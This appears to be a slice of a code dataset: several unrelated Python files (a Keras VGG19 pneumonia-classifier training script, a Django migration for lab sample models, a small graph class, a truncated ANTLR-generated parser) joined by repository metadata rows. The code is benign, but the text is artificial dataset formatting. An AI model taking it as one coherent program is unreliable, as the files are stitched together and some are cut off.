return Ranks.ranks.index(rank) | 27.90625 | 99 | 0.714446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 248 | 0.277716 |
e2e28b984f3ba5f8bd9d10b8dab354d8e3919ab9 | 4,169 | py | Python | train.py | Raghavkumarkakar252/Pneumonia_Diagnosis | 0c68d78ce4855289c7e335fde5f5caec2ba5a315 | [
"MIT"
] | null | null | null | train.py | Raghavkumarkakar252/Pneumonia_Diagnosis | 0c68d78ce4855289c7e335fde5f5caec2ba5a315 | [
"MIT"
] | null | null | null | train.py | Raghavkumarkakar252/Pneumonia_Diagnosis | 0c68d78ce4855289c7e335fde5f5caec2ba5a315 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 3 10:27:25 2019
@author: alishbaimran
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from imutils import paths
from sklearn.metrics import classification_report
from sklearn.metrics import accuracy_score
from keras.applications import VGG19
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import SGD
from keras.models import Model
from keras.layers import Dropout, Flatten, Dense, GlobalAveragePooling2D
from keras.callbacks import EarlyStopping
# defining constants and variables
# Input images are resized to 128x128; NB = number of output classes
# (normal vs pneumonia); BS = batch size; EPOCHS = training epochs.
img_width, img_height = 128, 128
train_data_dir = "data/train"
validation_data_dir = "data/val"
test_data_dir = "data/test"
NB = 2
BS = 64
EPOCHS = 10
# creating train, validation and test data generators
# Image counts per split, used to derive steps-per-epoch below.
TRAIN = len(list(paths.list_images(train_data_dir)))
VAL = len(list(paths.list_images(validation_data_dir)))
TEST = len(list(paths.list_images(test_data_dir)))
# Only rescaling is applied (pixel values normalised to [0, 1]).
trainAug = ImageDataGenerator(rescale = 1./255,
                              fill_mode = "nearest")
valAug = ImageDataGenerator(rescale = 1./255,
                            fill_mode = "nearest")
trainGen = trainAug.flow_from_directory(
    train_data_dir,
    target_size = (img_height, img_width),
    batch_size = BS,
    shuffle = True,
    class_mode = "categorical")
# Validation/test generators must not shuffle so predictions stay aligned
# with generator.classes for the metrics computed later.
valGen = valAug.flow_from_directory(
    validation_data_dir,
    target_size = (img_height, img_width),
    batch_size = BS,
    shuffle = False,
    class_mode = "categorical")
testGen = valAug.flow_from_directory(
    test_data_dir,
    target_size = (img_height, img_width),
    batch_size = BS,
    shuffle = False,
    class_mode = "categorical")
# loading pre-trained model, training additional features and saving model
# Transfer learning: VGG19 convolutional base (ImageNet weights) plus a
# new fully-connected classification head.
base_model = VGG19(weights = "imagenet", include_top=False,
                   input_shape = (img_width, img_height, 3))
x = base_model.output
x = Flatten()(x)
x = Dense(1024, activation = "relu")(x)
x = Dropout(0.4)(x)
x = Dense(256, activation = "relu")(x)
x = Dropout(0.2)(x)
preds = Dense(NB, activation = "softmax")(x)
model = Model(input = base_model.input, output = preds)
for i,layer in enumerate(model.layers):
    print(i,layer.name)
# Freeze the first 16 layers; fine-tune the rest plus the new head.
for layer in model.layers[:16]:
    layer.trainable=False
for layer in model.layers[16:]:
    layer.trainable=True
model.summary()
# Stop training early if validation accuracy fails to improve.
early = EarlyStopping(monitor = 'val_acc', min_delta = 0,
                      patience = 10, verbose= 1 , mode = 'auto')
model.compile(loss = "binary_crossentropy",
              optimizer = SGD(lr=0.001, momentum=0.9),
              metrics=["accuracy"])
H = model.fit_generator(
    trainGen,
    epochs = EPOCHS,
    steps_per_epoch = TRAIN // BS,
    validation_data = valGen,
    validation_steps = VAL // BS,
    callbacks = [early])
model.save('model.h5')
# generating predictions using model
testGen.reset()
predictions = model.predict_generator(testGen, steps = (TEST // BS) + 1)
# Convert per-class probabilities to predicted class indices.
predictions = np.argmax(predictions, axis=1)
print("Test set accuracy: " +
      str(accuracy_score(testGen.classes, predictions, normalize=True) * 100)
      + "%")
print(classification_report(testGen.classes, predictions,
                            target_names=testGen.class_indices.keys()))
# plotting training data
# Plot loss/accuracy curves for both the training and validation splits.
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, EPOCHS), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, EPOCHS), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, EPOCHS), H.history["acc"], label="train_acc")
plt.plot(np.arange(0, EPOCHS), H.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on Dataset")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
plt.savefig("plot.jpg") | 31.824427 | 79 | 0.630367 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 709 | 0.170065 |
e2e33b457fd2b88a3ff24791b4d153005a095c56 | 24,503 | py | Python | core/migrations/0001_initial.py | bpotvin-bccrc/colossus | fa5ca7ce4cfe794c7d2167acb868aa9167988941 | [
"MIT"
] | 2 | 2018-10-03T16:05:14.000Z | 2019-03-08T23:01:29.000Z | core/migrations/0001_initial.py | bpotvin-bccrc/colossus | fa5ca7ce4cfe794c7d2167acb868aa9167988941 | [
"MIT"
] | 3 | 2019-05-09T22:48:22.000Z | 2020-06-05T18:52:05.000Z | core/migrations/0001_initial.py | bpotvin-bccrc/colossus | fa5ca7ce4cfe794c7d2167acb868aa9167988941 | [
"MIT"
] | 4 | 2018-08-16T22:25:10.000Z | 2021-02-19T16:10:15.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2019-07-12 18:40
from __future__ import unicode_literals
import core.helpers
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AdditionalSampleInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tissue_state', models.CharField(blank=True, choices=[('NONE', 'None'), ('FROZ', 'Frozen'), ('FRES', 'Fresh'), ('DIG-FRES', 'Digested-Fresh')], default='NONE', max_length=50, null=True, verbose_name='Tissue State')),
('cancer_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Type')),
('cancer_subtype', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Subtype')),
('disease_condition_health_status', models.CharField(blank=True, max_length=50, null=True, verbose_name='Disease condition/health status')),
('sex', models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Mixed'), ('U', 'Unknown')], max_length=50, null=True, verbose_name='Sex')),
('patient_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Patient biopsy date')),
('anatomic_site', models.CharField(max_length=50, null=True, verbose_name='Anatomic site')),
('anatomic_sub_site', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anatomic sub-site')),
('developmental_stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Developmental stage')),
('tissue_type', models.CharField(choices=[('N', 'Normal'), ('B', 'Benign'), ('PM', 'Pre-malignant'), ('M', 'Malignant'), ('NNP', 'Non-neoplastic Disease'), ('U', 'Undetermined'), ('HP', 'Hyperplasia'), ('MP', 'Metaplasia'), ('DP', 'Dysplasia')], max_length=50, null=True, verbose_name='Tissue type')),
('cell_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell type')),
('pathology_disease_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Pathology/disease name (for diseased samples only)')),
('additional_pathology_info', models.CharField(blank=True, max_length=50, null=True, verbose_name='Additional pathology information')),
('grade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Grade')),
('stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Stage')),
('tumour_content', models.CharField(blank=True, max_length=50, null=True, verbose_name='Tumor content (%)')),
('pathology_occurrence', models.CharField(blank=True, choices=[('PR', 'Primary'), ('RC', 'Recurrent or Relapse'), ('ME', 'Metastatic'), ('RM', 'Remission'), ('UN', 'Undetermined'), ('US', 'Unspecified')], max_length=50, null=True, verbose_name='Pathology occurrence')),
('treatment_status', models.CharField(blank=True, choices=[('PR', 'Pre-treatment'), ('IN', 'In-treatment'), ('PO', 'Post-treatment'), ('NA', 'N/A'), ('UN', 'Unknown')], max_length=50, null=True, verbose_name='Treatment status')),
('family_information', models.CharField(blank=True, max_length=50, null=True, verbose_name='Family information')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='ChipRegion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('region_code', models.CharField(blank=True, max_length=50, null=True, verbose_name='region_code')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='ChipRegionMetadata',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('metadata_value', models.CharField(blank=True, max_length=50, null=True, verbose_name='Metadata value')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='HistoricalAdditionalSampleInformation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('tissue_state', models.CharField(blank=True, choices=[('NONE', 'None'), ('FROZ', 'Frozen'), ('FRES', 'Fresh'), ('DIG-FRES', 'Digested-Fresh')], default='NONE', max_length=50, null=True, verbose_name='Tissue State')),
('cancer_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Type')),
('cancer_subtype', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Subtype')),
('disease_condition_health_status', models.CharField(blank=True, max_length=50, null=True, verbose_name='Disease condition/health status')),
('sex', models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Mixed'), ('U', 'Unknown')], max_length=50, null=True, verbose_name='Sex')),
('patient_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Patient biopsy date')),
('anatomic_site', models.CharField(max_length=50, null=True, verbose_name='Anatomic site')),
('anatomic_sub_site', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anatomic sub-site')),
('developmental_stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Developmental stage')),
('tissue_type', models.CharField(choices=[('N', 'Normal'), ('B', 'Benign'), ('PM', 'Pre-malignant'), ('M', 'Malignant'), ('NNP', 'Non-neoplastic Disease'), ('U', 'Undetermined'), ('HP', 'Hyperplasia'), ('MP', 'Metaplasia'), ('DP', 'Dysplasia')], max_length=50, null=True, verbose_name='Tissue type')),
('cell_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell type')),
('pathology_disease_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Pathology/disease name (for diseased samples only)')),
('additional_pathology_info', models.CharField(blank=True, max_length=50, null=True, verbose_name='Additional pathology information')),
('grade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Grade')),
('stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Stage')),
('tumour_content', models.CharField(blank=True, max_length=50, null=True, verbose_name='Tumor content (%)')),
('pathology_occurrence', models.CharField(blank=True, choices=[('PR', 'Primary'), ('RC', 'Recurrent or Relapse'), ('ME', 'Metastatic'), ('RM', 'Remission'), ('UN', 'Undetermined'), ('US', 'Unspecified')], max_length=50, null=True, verbose_name='Pathology occurrence')),
('treatment_status', models.CharField(blank=True, choices=[('PR', 'Pre-treatment'), ('IN', 'In-treatment'), ('PO', 'Post-treatment'), ('NA', 'N/A'), ('UN', 'Unknown')], max_length=50, null=True, verbose_name='Treatment status')),
('family_information', models.CharField(blank=True, max_length=50, null=True, verbose_name='Family information')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical additional sample information',
'db_table': 'additional_sample_information_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalChipRegion',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('region_code', models.CharField(blank=True, max_length=50, null=True, verbose_name='region_code')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical chip region',
'db_table': 'chip_region_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalChipRegionMetadata',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('metadata_value', models.CharField(blank=True, max_length=50, null=True, verbose_name='Metadata value')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical chip region metadata',
'db_table': 'chip_region_metadata_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalJiraUser',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('username', models.CharField(max_length=150)),
('name', models.CharField(max_length=150)),
('associated_with_dlp', models.BooleanField(default=True)),
('associated_with_tenx', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical jira user',
'db_table': 'jira_user_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalMetadataField',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('field', models.CharField(max_length=50, verbose_name='Metadata key')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical metadata field',
'db_table': 'metadata_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalSample',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('sample_id', models.CharField(max_length=50, null=True, verbose_name='Sample ID')),
('taxonomy_id', models.CharField(blank=True, default='9606', max_length=50, null=True, verbose_name='Taxonomy ID')),
('sample_type', models.CharField(blank=True, choices=[('P', 'Patient'), ('C', 'Cell Line'), ('X', 'Xenograft'), ('Or', 'Organoid'), ('O', 'Other')], max_length=50, null=True, verbose_name='Sample type')),
('anonymous_patient_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anonymous patient ID')),
('cell_line_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell line ID')),
('xenograft_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Xenograft ID')),
('xenograft_recipient_taxonomy_id', models.CharField(blank=True, default='10090', max_length=50, null=True, verbose_name='Xenograft recipient taxonomy ID')),
('xenograft_treatment_status', models.CharField(blank=True, default='', max_length=50, verbose_name='Xenograft treatment status')),
('strain', models.CharField(blank=True, max_length=50, null=True, verbose_name='Strain')),
('xenograft_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Xenograft biopsy date')),
('notes', models.TextField(blank=True, max_length=5000, null=True, verbose_name='Notes')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical sample',
'db_table': 'history_sample',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalSublibraryInformation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('sample', models.CharField(blank=True, max_length=50, null=True, verbose_name='Sample')),
('row', models.IntegerField(blank=True, null=True, verbose_name='Row')),
('column', models.IntegerField(blank=True, null=True, verbose_name='Column')),
('img_col', models.IntegerField(blank=True, null=True, verbose_name='Image Column')),
('file_ch1', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch1')),
('file_ch2', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch2')),
('fld_section', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Section')),
('fld_index', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Index')),
('num_live', models.IntegerField(blank=True, null=True, verbose_name='Num_Live')),
('num_dead', models.IntegerField(blank=True, null=True, verbose_name='Num_Dead')),
('num_other', models.IntegerField(blank=True, null=True, verbose_name='Num_Other')),
('rev_live', models.IntegerField(blank=True, null=True, verbose_name='Rev_Live')),
('rev_dead', models.IntegerField(blank=True, null=True, verbose_name='Rev_Dead')),
('rev_other', models.IntegerField(blank=True, null=True, verbose_name='Rev_Other')),
('condition', models.CharField(blank=True, max_length=50, null=True, verbose_name='experimental_condition')),
('index_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I7')),
('primer_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I7')),
('index_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I5')),
('primer_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I5')),
('pick_met', models.CharField(blank=True, max_length=50, null=True, verbose_name='cell_call')),
('spot_well', models.CharField(blank=True, max_length=50, null=True, verbose_name='Spot_Well')),
('num_drops', models.IntegerField(blank=True, null=True, verbose_name='Num_Drops')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical sublibrary information',
'db_table': 'sub_library_information_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='JiraUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=150)),
('name', models.CharField(max_length=150)),
('associated_with_dlp', models.BooleanField(default=True)),
('associated_with_tenx', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='MetadataField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=50, verbose_name='Metadata key')),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
],
options={
'ordering': ['name'],
},
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='Sample',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sample_id', models.CharField(max_length=50, null=True, verbose_name='Sample ID')),
('taxonomy_id', models.CharField(blank=True, default='9606', max_length=50, null=True, verbose_name='Taxonomy ID')),
('sample_type', models.CharField(blank=True, choices=[('P', 'Patient'), ('C', 'Cell Line'), ('X', 'Xenograft'), ('Or', 'Organoid'), ('O', 'Other')], max_length=50, null=True, verbose_name='Sample type')),
('anonymous_patient_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anonymous patient ID')),
('cell_line_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell line ID')),
('xenograft_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Xenograft ID')),
('xenograft_recipient_taxonomy_id', models.CharField(blank=True, default='10090', max_length=50, null=True, verbose_name='Xenograft recipient taxonomy ID')),
('xenograft_treatment_status', models.CharField(blank=True, default='', max_length=50, verbose_name='Xenograft treatment status')),
('strain', models.CharField(blank=True, max_length=50, null=True, verbose_name='Strain')),
('xenograft_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Xenograft biopsy date')),
('notes', models.TextField(blank=True, max_length=5000, null=True, verbose_name='Notes')),
],
options={
'ordering': ['sample_id'],
},
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='SublibraryInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sample', models.CharField(blank=True, max_length=50, null=True, verbose_name='Sample')),
('row', models.IntegerField(blank=True, null=True, verbose_name='Row')),
('column', models.IntegerField(blank=True, null=True, verbose_name='Column')),
('img_col', models.IntegerField(blank=True, null=True, verbose_name='Image Column')),
('file_ch1', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch1')),
('file_ch2', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch2')),
('fld_section', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Section')),
('fld_index', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Index')),
('num_live', models.IntegerField(blank=True, null=True, verbose_name='Num_Live')),
('num_dead', models.IntegerField(blank=True, null=True, verbose_name='Num_Dead')),
('num_other', models.IntegerField(blank=True, null=True, verbose_name='Num_Other')),
('rev_live', models.IntegerField(blank=True, null=True, verbose_name='Rev_Live')),
('rev_dead', models.IntegerField(blank=True, null=True, verbose_name='Rev_Dead')),
('rev_other', models.IntegerField(blank=True, null=True, verbose_name='Rev_Other')),
('condition', models.CharField(blank=True, max_length=50, null=True, verbose_name='experimental_condition')),
('index_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I7')),
('primer_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I7')),
('index_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I5')),
('primer_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I5')),
('pick_met', models.CharField(blank=True, max_length=50, null=True, verbose_name='cell_call')),
('spot_well', models.CharField(blank=True, max_length=50, null=True, verbose_name='Spot_Well')),
('num_drops', models.IntegerField(blank=True, null=True, verbose_name='Num_Drops')),
('chip_region', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='core.ChipRegion', verbose_name='Chip_Region')),
],
bases=(models.Model, core.helpers.FieldValue),
),
]
| 76.571875 | 317 | 0.611762 | 24,262 | 0.990164 | 0 | 0 | 0 | 0 | 0 | 0 | 6,668 | 0.27213 |
e2e418de55f43f1db45de7f6ba6f8897b7cdff7d | 2,205 | py | Python | GraphADT.py | J-Chaudhary/dataStructureAndAlgo | 5ebdddb702e425251e3145d90861fa918cfbcda0 | [
"MIT"
] | null | null | null | GraphADT.py | J-Chaudhary/dataStructureAndAlgo | 5ebdddb702e425251e3145d90861fa918cfbcda0 | [
"MIT"
] | null | null | null | GraphADT.py | J-Chaudhary/dataStructureAndAlgo | 5ebdddb702e425251e3145d90861fa918cfbcda0 | [
"MIT"
] | null | null | null | class Vertex:
'''This class will create Vertex of Graph, include methods
add neighbours(v) and rem_neighbor(v)'''
def __init__(self, n): # To initiate instance Graph Vertex
self.name = n
self.neighbors = list()
self.color = 'black'
def add_neighbor(self, v): # To add neighbour in graph
if v not in self.neighbors:
self.neighbors.append(v)
self.neighbors.sort()
def rem_neighbor(self, v): # To remove neighbor in graph
if v in self.neighbors:
self.neighbors.remove(v)
class Graph:
'''This Graph Class will implement Graph using adjacency list include
methods add vertex, add edge and dfs triversal that print Vertax label using
adjacency list '''
vertices = {} # create directory
def add_vertex(self, vertex): # To add vertex
if isinstance(vertex, Vertex) and vertex.name not in self.vertices:
self.vertices[vertex.name] = vertex
return True
else:
return False
def add_edge(self, src, dst): # To add Edges
if src in self.vertices and dst in self.vertices:
for key, value in self.vertices.items():
if key == src:
value.add_neighbor(dst)
if key == dst:
value.add_neighbor(src)
return True
else:
return False
def rem_edge(self, src, dst): # To remove Edges
if src in self.vertices and dst in self.vertices:
self.vertices[src].rem_neighbor(dst)
self.vertices[dst].rem_neighbor(src)
print("Edges removed from {} to {}".format(src, dst))
return True
else:
return False
def dfs(self, vertex): # dfs Triversal
vertex.color = 'blue'
for v in vertex.neighbors:
if self.vertices[v].color == 'black':
self.dfs(self.vertices[v])
vertex.color = 'blue'
if vertex.color == 'blue':
for key in sorted(list(self.vertices.keys())):
print(key + str(self.vertices[key].neighbors))
| 35.564516 | 81 | 0.563719 | 2,197 | 0.996372 | 0 | 0 | 0 | 0 | 0 | 0 | 518 | 0.234921 |
e2e456ab2aaa5fdcc808e3cfb4ffe47c48124124 | 213,896 | py | Python | sphinx_a4doc/syntax/gen/syntax/ANTLRv4Parser.py | sandrotosi/sphinx-a4doc | f1f30c73b8095e2bb81508f7f984d2f8fe70d899 | [
"MIT"
] | 4 | 2019-05-09T20:40:52.000Z | 2021-05-08T07:17:43.000Z | sphinx_a4doc/syntax/gen/syntax/ANTLRv4Parser.py | sandrotosi/sphinx-a4doc | f1f30c73b8095e2bb81508f7f984d2f8fe70d899 | [
"MIT"
] | 8 | 2020-07-05T12:41:31.000Z | 2020-12-27T06:40:39.000Z | sphinx_a4doc/syntax/gen/syntax/ANTLRv4Parser.py | sandrotosi/sphinx-a4doc | f1f30c73b8095e2bb81508f7f984d2f8fe70d899 | [
"MIT"
] | 1 | 2020-07-05T11:51:02.000Z | 2020-07-05T11:51:02.000Z | # encoding: utf-8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
    """Return the serialized ATN (augmented transition network) for this
    parser as a single string.

    Auto-generated by the ANTLR tool: the ``buf.write`` payload below is
    opaque serialized automaton data (deserialized once at class-definition
    time by ``ATNDeserializer``) and must not be edited by hand.
    """
    with StringIO() as buf:
        buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3@")
        buf.write("\u027b\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
        buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
        buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
        buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
        buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36")
        buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t")
        buf.write("&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4")
        buf.write("/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64")
        buf.write("\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:\4;\t")
        buf.write(";\4<\t<\4=\t=\4>\t>\3\2\7\2~\n\2\f\2\16\2\u0081\13\2\3")
        buf.write("\2\3\2\3\2\3\2\7\2\u0087\n\2\f\2\16\2\u008a\13\2\3\2\3")
        buf.write("\2\7\2\u008e\n\2\f\2\16\2\u0091\13\2\3\2\3\2\3\3\3\3\3")
        buf.write("\3\3\3\3\3\5\3\u009a\n\3\3\4\3\4\3\4\3\4\3\4\5\4\u00a1")
        buf.write("\n\4\3\5\3\5\3\5\3\5\7\5\u00a7\n\5\f\5\16\5\u00aa\13\5")
        buf.write("\3\5\3\5\3\6\3\6\3\6\3\6\3\7\3\7\3\7\7\7\u00b5\n\7\f\7")
        buf.write("\16\7\u00b8\13\7\3\7\3\7\3\7\5\7\u00bd\n\7\3\b\3\b\3\b")
        buf.write("\3\b\7\b\u00c3\n\b\f\b\16\b\u00c6\13\b\3\b\3\b\3\t\3\t")
        buf.write("\3\n\3\n\5\n\u00ce\n\n\3\n\3\n\3\13\3\13\5\13\u00d4\n")
        buf.write("\13\3\13\3\13\3\f\3\f\3\f\7\f\u00db\n\f\f\f\16\f\u00de")
        buf.write("\13\f\3\f\5\f\u00e1\n\f\3\r\3\r\3\r\3\r\5\r\u00e7\n\r")
        buf.write("\3\r\3\r\3\r\3\16\3\16\3\16\5\16\u00ef\n\16\3\17\3\17")
        buf.write("\7\17\u00f3\n\17\f\17\16\17\u00f6\13\17\3\17\3\17\3\20")
        buf.write("\3\20\7\20\u00fc\n\20\f\20\16\20\u00ff\13\20\3\20\3\20")
        buf.write("\3\21\3\21\3\21\3\21\7\21\u0107\n\21\f\21\16\21\u010a")
        buf.write("\13\21\3\22\7\22\u010d\n\22\f\22\16\22\u0110\13\22\3\23")
        buf.write("\7\23\u0113\n\23\f\23\16\23\u0116\13\23\3\23\3\23\5\23")
        buf.write("\u011a\n\23\3\24\7\24\u011d\n\24\f\24\16\24\u0120\13\24")
        buf.write("\3\24\5\24\u0123\n\24\3\24\3\24\5\24\u0127\n\24\3\24\5")
        buf.write("\24\u012a\n\24\3\24\5\24\u012d\n\24\3\24\5\24\u0130\n")
        buf.write("\24\3\24\7\24\u0133\n\24\f\24\16\24\u0136\13\24\3\24\3")
        buf.write("\24\3\24\3\24\3\24\3\25\7\25\u013e\n\25\f\25\16\25\u0141")
        buf.write("\13\25\3\25\5\25\u0144\n\25\3\26\3\26\3\26\3\26\3\27\3")
        buf.write("\27\3\27\3\30\3\30\5\30\u014f\n\30\3\31\3\31\3\31\3\32")
